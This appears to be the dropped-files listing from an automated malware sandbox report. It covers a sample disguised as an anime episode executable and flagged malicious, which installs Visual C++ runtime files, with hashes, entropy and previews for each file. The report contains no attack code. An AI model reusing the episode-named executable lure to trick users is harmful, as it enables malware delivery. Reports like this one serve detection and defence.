                                                                        Process:C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):956
                                                                        Entropy (8bit):2.7044346396875776
                                                                        Encrypted:false
                                                                        SSDEEP:12:PZK34pgMClGttDK+xU9TbMuAttun2QERQ1qr4h6un2Q1Q1qr8:BKUgMClccTbl0W8448
                                                                        MD5:8A05B9F9D456BF6E06E16D1F4D39186B
                                                                        SHA1:D105357D1D8465E0F4FD22FB4D4DE1B6E82FC75C
                                                                        SHA-256:C1C32794DC614DD517BFCE1C201D145377275D4A20960BBBA0154D256F08A07D
                                                                        SHA-512:8FFAC930CFAF4B656CB1FD6FCDAF984C73B6FEA9E062943538BBF10F2C4D31F5B609F728BB4F7DE3620065EF3C2288678DD159A5CBDED59017BD32F3B916AF3D
                                                                        Malicious:false
                                                                        Preview:F...................................................................................................................................................................................................................................................W.i.x.B.u.n.d.l.e.F.o.r.c.e.d.R.e.s.t.a.r.t.P.a.c.k.a.g.e.....................W.i.x.B.u.n.d.l.e.L.a.s.t.U.s.e.d.S.o.u.r.c.e.....................W.i.x.B.u.n.d.l.e.N.a.m.e.....B...M.i.c.r.o.s.o.f.t. .V.i.s.u.a.l. .C.+.+. .2.0.1.5.-.2.0.2.2. .R.e.d.i.s.t.r.i.b.u.t.a.b.l.e. .(.x.6.4.). .-. .1.4...3.4...3.1.9.3.1.............W.i.x.B.u.n.d.l.e.O.r.i.g.i.n.a.l.S.o.u.r.c.e.....C...C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.i.s.-.8.S.T.S.I...t.m.p.\.V.C._.r.e.d.i.s.t...x.6.4...e.x.e.............W.i.x.B.u.n.d.l.e.O.r.i.g.i.n.a.l.S.o.u.r.c.e.F.o.l.d.e.r.....2...C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.i.s.-.8.S.T.S.I...t.m.p.\.........................
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):1156
                                                                        Entropy (8bit):2.8978478940985903
                                                                        Encrypted:false
                                                                        SSDEEP:12:/ZK34pgMClGttD6+xU9m4UMzttun2QBa1Q1UMClB609Ty3Xun2Q/1Q1UMClB60R:xKUgMClccD3qSMClBj+3IqSMClB
                                                                        MD5:3E894EDF8818752C565F3BB3EADC7689
                                                                        SHA1:5865BAFEA2B47E7B31943DF74D9BAA2F85081089
                                                                        SHA-256:B511600B5F89ECFECFD6C11BD8CF3E34EE021367396D741E988F8FBF7EDFA996
                                                                        SHA-512:47131499C0E900C01B3A62A31903C525CB7B13F191B8D6B68BAF353C2F37E2D3F7AFF8F4CCEB3A99BD734CF89B7BB360920096123899391C42F30DA40829F82F
                                                                        Malicious:false
                                                                        Preview:F...............................................................................................................................................................................................................................................W.i.x.B.u.n.d.l.e.F.o.r.c.e.d.R.e.s.t.a.r.t.P.a.c.k.a.g.e.....................W.i.x.B.u.n.d.l.e.L.a.s.t.U.s.e.d.S.o.u.r.c.e.........................W.i.x.B.u.n.d.l.e.N.a.m.e.....B...M.i.c.r.o.s.o.f.t. .V.i.s.u.a.l. .C.+.+. .2.0.1.5.-.2.0.1.9. .R.e.d.i.s.t.r.i.b.u.t.a.b.l.e. .(.x.6.4.). .-. .1.4...2.1...2.7.7.0.2.............W.i.x.B.u.n.d.l.e.O.r.i.g.i.n.a.l.S.o.u.r.c.e.....w...C.:.\.U.s.e.r.s.\.p.r.a.t.e.s.h.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.P.a.c.k.a.g.e.s.\.M.i.c.r.o.s.o.f.t...M.i.c.r.o.s.o.f.t.E.d.g.e._.8.w.e.k.y.b.3.d.8.b.b.w.e.\.T.e.m.p.S.t.a.t.e.\.D.o.w.n.l.o.a.d.s.\.v.c._.r.e.d.i.s.t...x.6.4. .(.1.)...e.x.e.............W.i.x.B.u.n.d.l.e.O.r.i.g.i.n.a.l.S.o.u.r.c.e.F.o.l.d.e.r.....b...C.:.\.U.s.e.r.s.\.p.r.a.t.e.s.h.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.P.
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:ASCII text, with very long lines (438), with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):19250
                                                                        Entropy (8bit):5.512971661798002
                                                                        Encrypted:false
                                                                        SSDEEP:192:N6ygWnl1g1O1d1Z1+1M1T1UeQpZ14/sopEuQjNjxjs2psZTOMsMJrLdV2aIDF6:4yryeQpZ18QhFWjVV2a2F6
                                                                        MD5:418FEE906B33302A2C52136B469FA2B8
                                                                        SHA1:4A5995E340294A80564873465F9F0B1D7232C4CA
                                                                        SHA-256:019FE0508AA2A7A4630C7FA76379E52EAADC85760234D708D3F1564BD32445C4
                                                                        SHA-512:E720041087780868E633E7D655EB86824A5F1A2478DCE3D621AEA230453BDEEAA5513E1D634048A04D8CA7DE520A1A96EBF9534711EC574BAD311A9027934AD7
                                                                        Malicious:false
                                                                        Preview:[14FC:11B4][2023-01-02T15:34:49]i001: Burn v3.10.4.4718, Windows v10.0 (Build 17134: Service Pack 0), path: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe..[14FC:11B4][2023-01-02T15:34:50]i009: Command Line: '-burn.clean.room=C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe -burn.filehandle.attached=588 -burn.filehandle.self=628 /install /quiet'..[14FC:11B4][2023-01-02T15:34:50]i000: Setting string variable 'WixBundleOriginalSource' to value 'C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe'..[14FC:11B4][2023-01-02T15:34:50]i000: Setting string variable 'WixBundleOriginalSourceFolder' to value 'C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\'..[14FC:11B4][2023-01-02T15:34:54]i000: Setting string variable 'WixBundleLog' to value 'C:\Users\user\AppData\Local\Temp\dd_vcredist_amd64_20230102153454.log'..[14FC:11B4][2023-01-02T15:34:54]i000: Setting string variable 'WixBundleName' to value 'Microsoft Visual C++ 2015-
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (319), with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):240258
                                                                        Entropy (8bit):3.8206617818669906
                                                                        Encrypted:false
                                                                        SSDEEP:3072:kY45dEjj/DDDDDDDD2ICsjG/HHHHHHHHHHtr2RuhHO0sDGBXw:7jHjh
                                                                        MD5:0EB7F01D2B97F1BA524029E46782373A
                                                                        SHA1:1B517F4C36D1BFD8CF2DA1C84CEA41FD8318AC64
                                                                        SHA-256:D98F4C940C5CA1058AD562BB4E8E59A46FC4B1C19D08357AA582B668EA4125AC
                                                                        SHA-512:7F5C3219A0AD0AF1D9CC1EAFCEEE39AB3B958AEFAEB4FA40D7D20BB6BEDBE50BB84C77D272D1370AC1E30A58BEA36C348BABAA2C4E9AF15A1F6305F46D99CE43
                                                                        Malicious:false
                                                                        Preview:..=.=.=. .V.e.r.b.o.s.e. .l.o.g.g.i.n.g. .s.t.a.r.t.e.d.:. .1./.2./.2.0.2.3. . .1.5.:.3.4.:.5.9. . .B.u.i.l.d. .t.y.p.e.:. .S.H.I.P. .U.N.I.C.O.D.E. .5...0.0...1.0.0.1.1...0.0. . .C.a.l.l.i.n.g. .p.r.o.c.e.s.s.:. .C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.{.5.2.1.7.5.C.1.E.-.1.8.0.F.-.4.5.2.E.-.8.3.F.2.-.4.E.F.0.7.D.A.E.0.B.C.F.}.\...b.e.\.V.C._.r.e.d.i.s.t...x.6.4...e.x.e. .=.=.=.....M.S.I. .(.c.). .(.5.C.:.8.4.). .[.1.5.:.3.4.:.5.9.:.1.1.7.].:. .R.e.s.e.t.t.i.n.g. .c.a.c.h.e.d. .p.o.l.i.c.y. .v.a.l.u.e.s.....M.S.I. .(.c.). .(.5.C.:.8.4.). .[.1.5.:.3.4.:.5.9.:.1.1.7.].:. .M.a.c.h.i.n.e. .p.o.l.i.c.y. .v.a.l.u.e. .'.D.e.b.u.g.'. .i.s. .0.....M.S.I. .(.c.). .(.5.C.:.8.4.). .[.1.5.:.3.4.:.5.9.:.1.1.7.].:. .*.*.*.*.*.*.*. .R.u.n.E.n.g.i.n.e.:..... . . . . . . . . . . .*.*.*.*.*.*.*. .P.r.o.d.u.c.t.:. .C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.P.a.c.k.a.g.e. .C.a.c.h.e.\.{.C.F.4.C.3.4.7.D.-.9.5.4.E.-.4.5.4.3.-.8.8.D.2.-.E.C.1.7.F.0.7.F.4.6.6.F.}.v.1.4...3.4...3.1.9.3.1.\.p.a.c.k.a.g.e.s.\.v.c.R.u.n.t.i.m.e.M.i.
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (319), with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):266728
                                                                        Entropy (8bit):3.829195679668369
                                                                        Encrypted:false
                                                                        SSDEEP:3072:Ndpxh7KjvHgWXXXXXXXXXXXXXZ+9jOE2RRRRRRRRRRRRRnFtpnug+DPOOJUNtR8m:Ijoje
                                                                        MD5:3E14DC8FB1B909CBD391455CAA070505
                                                                        SHA1:2241AA6D5F20C2FC6BEEEEB7929DB97384BE2FAC
                                                                        SHA-256:1B3BD1A309C4BDDF1F298C369C054954A6599FDD9777A5041F6BF6A7C8304D05
                                                                        SHA-512:34A719E466A51384F06C5E235381028827FAB296807856E2A631F4EDC5F819DBA300CB44E74FE54C099E6F30668EB4E6FBF44C9A93E3B34835BAD5EF6923A8FF
                                                                        Malicious:false
                                                                        Preview:..=.=.=. .V.e.r.b.o.s.e. .l.o.g.g.i.n.g. .s.t.a.r.t.e.d.:. .1./.2./.2.0.2.3. . .1.5.:.3.5.:.1.7. . .B.u.i.l.d. .t.y.p.e.:. .S.H.I.P. .U.N.I.C.O.D.E. .5...0.0...1.0.0.1.1...0.0. . .C.a.l.l.i.n.g. .p.r.o.c.e.s.s.:. .C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.{.5.2.1.7.5.C.1.E.-.1.8.0.F.-.4.5.2.E.-.8.3.F.2.-.4.E.F.0.7.D.A.E.0.B.C.F.}.\...b.e.\.V.C._.r.e.d.i.s.t...x.6.4...e.x.e. .=.=.=.....M.S.I. .(.c.). .(.5.C.:.7.4.). .[.1.5.:.3.5.:.1.7.:.3.2.0.].:. .R.e.s.e.t.t.i.n.g. .c.a.c.h.e.d. .p.o.l.i.c.y. .v.a.l.u.e.s.....M.S.I. .(.c.). .(.5.C.:.7.4.). .[.1.5.:.3.5.:.1.7.:.3.2.0.].:. .M.a.c.h.i.n.e. .p.o.l.i.c.y. .v.a.l.u.e. .'.D.e.b.u.g.'. .i.s. .0.....M.S.I. .(.c.). .(.5.C.:.7.4.). .[.1.5.:.3.5.:.1.7.:.3.2.0.].:. .*.*.*.*.*.*.*. .R.u.n.E.n.g.i.n.e.:..... . . . . . . . . . . .*.*.*.*.*.*.*. .P.r.o.d.u.c.t.:. .C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.P.a.c.k.a.g.e. .C.a.c.h.e.\.{.E.A.E.2.4.2.B.1.-.0.A.2.6.-.4.8.5.A.-.B.F.E.B.-.0.2.9.2.E.E.9.F.0.3.C.B.}.v.1.4...3.4...3.1.9.3.1.\.p.a.c.k.a.g.e.s.\.v.c.R.u.n.t.i.m.e.A.d.
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:ASCII text, with very long lines (443), with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):12697
                                                                        Entropy (8bit):5.435090951591286
                                                                        Encrypted:false
                                                                        SSDEEP:192:GAN4CnvD1g1O1d1Z1+1M1T1SnFSrS38FLeFi:GO3fG3meg
                                                                        MD5:D90BEB92CB0F641A758FB7F7C33451CC
                                                                        SHA1:411BD200C0D4AE7EC3DBE50188AA71F43667E519
                                                                        SHA-256:D62638C6FDDCE52C44B42FD758FEB92DCB2568C3139FD1428675A52FBFB9DD6C
                                                                        SHA-512:93910E5D4647EDA5F6078F9B27C4A9D64D5C9F4A469AD4777DABEEFFC3FC55E8E7F6F87BF3786AEF08CF38A9D5CA4B6862A25C1AEB0DEB25BF7100A54CAD8ABC
                                                                        Malicious:false
                                                                        Preview:[085C:055C][2023-01-02T15:35:24]i001: Burn v3.10.4.4718, Windows v10.0 (Build 17134: Service Pack 0), path: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe..[085C:055C][2023-01-02T15:35:24]i003: This bundle is being run by a related bundle as type 'Upgrade'...[085C:055C][2023-01-02T15:35:24]i009: Command Line: '"-burn.clean.room=C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -burn.filehandle.attached=540 -burn.filehandle.self=564 -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=1008 -burn.embedded BurnPipe.{652D427C-3FCF-4F57-9B0A-0FFBCA2578FC} {CF7111B3-FF83-47BF-A56D-0E99B89A84C1} 5468'..[085C:055C][2023-01-02T15:35:26]i000: Setting string variable 'WixBundleLog' to value 'C:\Users\user\AppData\Local\Temp\dd_vcredist_amd64_20230102153526.log'..[085C:055C][2023-01-02T15:35:26]i000: Setting string variable 'WixBundleManufacturer' to value
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:ASCII text, with very long lines (442), with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):10979
                                                                        Entropy (8bit):5.407189727137652
                                                                        Encrypted:false
                                                                        SSDEEP:192:sTiLxXvnAc1j1J1O1+1t1T1w1khWE2DtcEVitVgKX7ll1leRbobqZ2DQPlHaOd:sExf1lnd2
                                                                        MD5:AD5937EE185B6A4124BB7FDDF79B2BF2
                                                                        SHA1:B84E382F0E68A816783A7787C55E5B1EB062FB53
                                                                        SHA-256:CEC59E151C1CE895650B1A250E2837C13EB8740426BB30C181E0AFE0FCBD66BF
                                                                        SHA-512:B06894F0D9F34AB13FA8B7E964BC3C088F22A9AC84A24176B27046A9081B77A15BCAD344894A16B9DB20B24CE947F4D2D10C77911B3F0BCBA233D0887C9B625D
                                                                        Malicious:false
                                                                        Preview:[0FA8:0CA0][2023-01-02T15:35:27]i001: Burn v3.10.4.4718, Windows v10.0 (Build 17134: Service Pack 0), path: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe..[0FA8:0CA0][2023-01-02T15:35:27]i003: This bundle is being run by a related bundle as type 'Upgrade'...[0FA8:0CA0][2023-01-02T15:35:27]i009: Command Line: '"-burn.clean.room=C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe" -burn.filehandle.attached=576 -burn.filehandle.self=572 -uninstall -quiet -burn.related.upgrade -burn.ancestors={d4cecf3b-b68f-4995-8840-52ea0fab646e} -burn.filehandle.self=900 -burn.embedded BurnPipe.{8ADE75BE-8C64-4D11-B05A-A6C78AECD63F} {6EE058D7-D097-43E8-87F0-A357D97D5238} 1324'..[0FA8:0CA0][2023-01-02T15:35:32]i000: Setting string variable 'WixBundleLog' to value 'C:\Users\user\AppData\Local\Temp\dd_vcredist_amd64_20230102153532.log'..[0FA8:0CA0][2023-01-02T15:35:32]i000: Setting string variable 'WixBundleName' to value 'Microso
                                                                        Process:C:\Users\user\Desktop\Boku no Hero Academia 6th Season - Episode 13.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):3014144
                                                                        Entropy (8bit):6.394084543221017
                                                                        Encrypted:false
                                                                        SSDEEP:49152:QLJwSihjOb6GLb4SKEs3DyOMC2DlgwccAP8SOHxVkTE0:swSi0b67zeC/wccAP85H
                                                                        MD5:F16A37D7AF3DB8C75F19AF9B3453D9C8
                                                                        SHA1:F9D7D6F6FB576A3A4EA21242DA573F3CD2E6CF7B
                                                                        SHA-256:331D38B58C12BEDDFDBF6AC6AF1BB6B701907897EDD2C932D59397DB63853047
                                                                        SHA-512:9BBB342DE5E188B869A5C4FFB8DE845D96DB40481238EF002869E4DF8795DE2D891ED3A3401837605F2A9525FCAB62F5EBD3AA5DA47B204625F1EC14CC27E9E7
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):25466016
                                                                        Entropy (8bit):7.996942692984511
                                                                        Encrypted:true
                                                                        SSDEEP:786432:tEp+Ty2SfUfnLZnvko+Me/ht8+0c4Nz55TOZHzqnIlh:yp+Ty2SfWnVvkodepC+05NbOZHzqnIlh
                                                                        MD5:703BD677778F2A1BA1EB4338BAC3B868
                                                                        SHA1:A176F140E942920B777F80DE89E16EA57EE32BE8
                                                                        SHA-256:2257B3FBE3C7559DE8B31170155A433FAF5B83829E67C589D5674FF086B868B9
                                                                        SHA-512:A66EA382D8BDD31491627FD698242D2EDA38B1D9DF762C402923EF40BBCA6AA2F43F22FA811C5FC894B529F9E77FCDD5CED9CD8AF4A19F53845FCE3780E8C041
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-4N7PP.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp
                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):6144
                                                                        Entropy (8bit):4.720366600008286
                                                                        Encrypted:false
                                                                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                        MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                        SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                        SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                        SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-4VP2B.tmp\Boku no Hero Academia 6th Season - Episode 13.tmp
                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):6144
                                                                        Entropy (8bit):4.720366600008286
                                                                        Encrypted:false
                                                                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                        MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                        SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                        SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                        SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):18415
                                                                        Entropy (8bit):4.043868285184243
                                                                        Encrypted:false
                                                                        SSDEEP:192:Haz4aHQbC6dBCLCNavmu6OqSPEmmVUJ9etKL5W2cBxGC4iSM0fvJ9seyryH1mqGI:2yk/RF8e7GWU2
                                                                        MD5:2B063D92663595DFE4781AE687A03D86
                                                                        SHA1:0FB582E756DBC751EA380593AC4DA27DDB4EBB06
                                                                        SHA-256:44C76290F7A2E45940E8338912FEB49BCF4E071CFA85D2D34762857743ACBC8D
                                                                        SHA-512:94C8FDA6173C7F5740F206190EDCD1F1F1C309596B710D400E23CD363A619D707A5D4576D4FE63AB7CB68947F009EFD29A1FBE04743A294698BF2AE17E92C214
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset134 SimSun;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT \f1\'dc\'9b\'f3\'77\'ca\'da\'99\'e0\'97\'6c\'bf\'ee\f0\par..MICROSOFT VISUAL C++ 2015 - 2022 \f1\'88\'cc\'d0\'d0\'eb\'41\'b6\'ce\f0 \par..\b0\f1\'b1\'be\'ca\'da\'99\'e0\'97\'6c\'bf\'ee\'ca\'c7\'d9\'46\'d3\'c3\'91\'f4\'c5\'63\f0 Microsoft Corporation (\f1\'bb\'f2\'c6\'e4\'ea\'50\'82\'53\'c6\'f3\'98\'49\'a3\'ac\'d2\'95\'d9\'46\'d3\'c3\'91\'f4\'cb\'f9\'be\'d3\'d7\'a1\'b5\'c4\'b5\'d8\'fc\'63\'b6\'f8\'b6\'a8\f0 ) \f1\'d6\'ae\'e9\'67\'b3\'c9\'c1\'a2\'b5\'c4\'ba\'cf\'bc\'73\'a1\'a3\'cb\'fc\'82\'83\'df\'6d\'d3\'c3\'ec\'b6\'c9\'cf\'ca\'f6\'dc\'9b\'f3\'77\'a1\'a3\'b1\'be\'ca\'da\'99\'e0\'97\'6c\'bf\'ee\'d2\'e0\'df\'6d\'d3\'c3\'ec\'b6\'c8\'ce\'ba\'ce\f0 Microsoft \f1\'b7\'fe\'84\'d5\
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):2980
                                                                        Entropy (8bit):6.163758160900388
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOtMes9T/JhDXsA9EHSniarRFeOrw8N3mZNNTN2N08CEjMUWFPmDlTKJKy2:uDiTlFrDDsA9tfHP8+8nhM0WamzqDFqD
                                                                        MD5:472ABBEDCBAD24DBA5B5F5E8D02C340F
                                                                        SHA1:974F62B5C2E149C3879DD16E5A9DBB9406C3DB85
                                                                        SHA-256:8E2E660DFB66CB453E17F1B6991799678B1C8B350A55F9EBE2BA0028018A15AD
                                                                        SHA-512:676E29378AAED25DE6008D213EFA10D1F5AAD107833E218D71F697E728B7B5B57DE42E7A910F121948D7B1B47AB4F7AE63F71196C747E8AE2B4827F754FC2699
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] ....</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.......?</String>.. <String Id="HelpHeader">....</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - ................. ......................../passive | /quiet - .... UI ........... UI.... ........... UI ........../norestart - ................UI ............./log log.txt - .........
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):13234
                                                                        Entropy (8bit):5.125368352290407
                                                                        Encrypted:false
                                                                        SSDEEP:192:T7wfl7OGpX5a5HEgQ2psch5jotXxEvH++3kamdyjCrDZugDHgbGNl86NhrYGY9D2:Yfl7O5ocINaHmjI44fUixAvOwwrJ2
                                                                        MD5:E7DC9CA9474A13FA4529D91BCD2AB8CC
                                                                        SHA1:511F5DE8A99C09EC3766C5E2494A79EACCA261C8
                                                                        SHA-256:503C433DCDE2F3A9E7D388A5FF2B0612E7D8F90F5188D5B2B60228DB33044FDE
                                                                        SHA-512:77108E53CD58E42F847D8EF23A07723C4849DC41DBE1C3EF939B9170E75F525BEC9D210D6C1FBFEB330ECE2E77B8A8E2808730D9E6F72F5B3FE626D58B6068C6
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset238 Tahoma;}{\f2\fnil\fcharset0 Garamond;}{\f3\fnil Tahoma;}{\f4\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 LICEN\f1\'c8N\f0\'cd PODM\'cdNKY PRO SOFTWARE SPOLE\f1\'c8NOSTI MICROSOFT\par..\f0 MICROSOFT VISUAL C++ 2015 - 2022 RUNTIME \par..\b0 Tyto licen\f1\'e8n\f0\'ed podm\'ednky p\f1\'f8edstavuj\f0\'ed smlouvu mezi spole\f1\'e8nost\f0\'ed Microsoft Corporation (nebo n\f1\'eckterou z jej\f0\'edch afilac\'ed, v\~z\'e1vislosti na tom, kde bydl\'edte) a v\'e1mi. Vztahuj\'ed se na v\'fd\f1\'9ae uveden\f0\'fd software. Podm\'ednky se rovn\f1\'ec\'9e vztahuj\f0\'ed na jak\'e9koli slu\f1\'9eby Microsoft nebo aktualizace pro software, pokud se na slu\'9eby nebo aktualizace nevztahuj\f0\'ed odli\f1\'9an\f0\'e9 podm\'ednky.\par..\b DODR\f1\'8e\f0\'cdTE-LI
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3333
                                                                        Entropy (8bit):5.370651462060085
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOtesM6H2hDdxHOjZxsaIIy3Iy5sDMN3mkNFN7NwcfiPc3hKPnWZLF0hKqZ:uDiTlVxxHOy/9xXfpZJYnL8xK2S
                                                                        MD5:16343005D29EC431891B02F048C7F581
                                                                        SHA1:85A14C40C482D9351271F6119D272D19407C3CE9
                                                                        SHA-256:07FB3EC174F25DFBE532D9D739234D9DFDA8E9D34F01FE660C5B4D56989FA779
                                                                        SHA-512:FF1AE9C21DCFB018DD4EC82A6D43362CB8C591E21F45DD1C25955D83D328B57C8D454BBE33FBC73A70DADF1DFB3AE27502C9B3A8A3FF2DA97085CA0D9A68AB03
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Instala.n. program [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Opravdu chcete akci zru.it?</String>.. <String Id="HelpHeader">N.pov.da nastaven.</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [adres..] . Nainstaluje, oprav., odinstaluje nebo.. vytvo.. .plnou m.stn. kopii svazku v adres..i. V.choz. mo.nost. je instalace...../passive | /quiet . Zobraz. minim.ln. u.ivatelsk. rozhran. bez v.zev nebo nezobraz. ..dn. u.ivatelsk. rozhran. a.. ..dn. v.zvy. V.choz. mo.nost. je zobrazen. u.ivatelsk.ho rozhran. a v.ech v.zev...../noresta
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):12392
                                                                        Entropy (8bit):5.192979871787938
                                                                        Encrypted:false
                                                                        SSDEEP:192:N6AY7JCc/2WVJtntrUqMmvuUh+mxYpnY4+ZqDe6mUZaEzYNvQ8yOejISRC4WL32:PUw2lSSssWVzOHyOejIS/22
                                                                        MD5:2DDCA2866D76C850F68ACDFDB696D6DE
                                                                        SHA1:C5076F10B0F0654CDE2C990DEEB2772F3CC4844B
                                                                        SHA-256:28F63BAD9C2960395106011761993049546607F8A850D344D6A54042176BF03F
